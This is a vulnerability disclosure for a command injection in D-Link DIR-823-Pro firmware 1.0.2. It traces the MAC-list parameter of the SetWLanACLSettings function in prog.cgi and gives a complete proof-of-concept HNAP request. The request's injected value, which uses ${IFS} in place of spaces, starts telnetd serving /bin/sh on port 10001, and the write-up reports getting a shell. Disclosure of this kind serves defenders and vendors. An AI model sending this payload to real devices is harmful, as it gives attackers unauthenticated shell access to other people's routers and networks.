# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `SetWLanACLSettings` function, `wl(0).(0)_maclist` is directly passed by the attacker, so we can control the `wl(0).(0)_maclist` to attack the OS.

As you can see here, the initial input will be extracted and cause command injection.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

It mainly contains two parts of processing logic：

* Split the string to extract the mac address set
* Replace the space character in the obtained mac address set with a semicolon character

> So the injected command string cannot contain spaces！
>

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.What’s more interesting is that in the front-end interface, the user’s input is not checked either.



## PoC

We set `wl(0).(0)_maclist` as **`telnetd${IFS}-l${IFS}/bin/sh${IFS}-p${IFS}10001${IFS}-b${IFS}0.0.0.0`** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetWLanACLSettings"
HNAP_AUTH: E43B0588D13E8A869B5C647537806273 1642575372032
Content-Length: 165
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/AdvWlanAccess.html
Cookie: work_mode=router; uid=Sf41C4M3; PrivateKey=25D6D78F32780098A4EEF089E43A99E2; timeout=24

{"SetWLanACLSettings":{"wl(0).(0)_maclist_mode":"deny","wl(0).(0)_maclist":"LAPTOP-T5L2BUG7,`telnetd${IFS}-l${IFS}/bin/sh${IFS}-p${IFS}10001${IFS}-b${IFS}0.0.0.0`"}}
```

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>
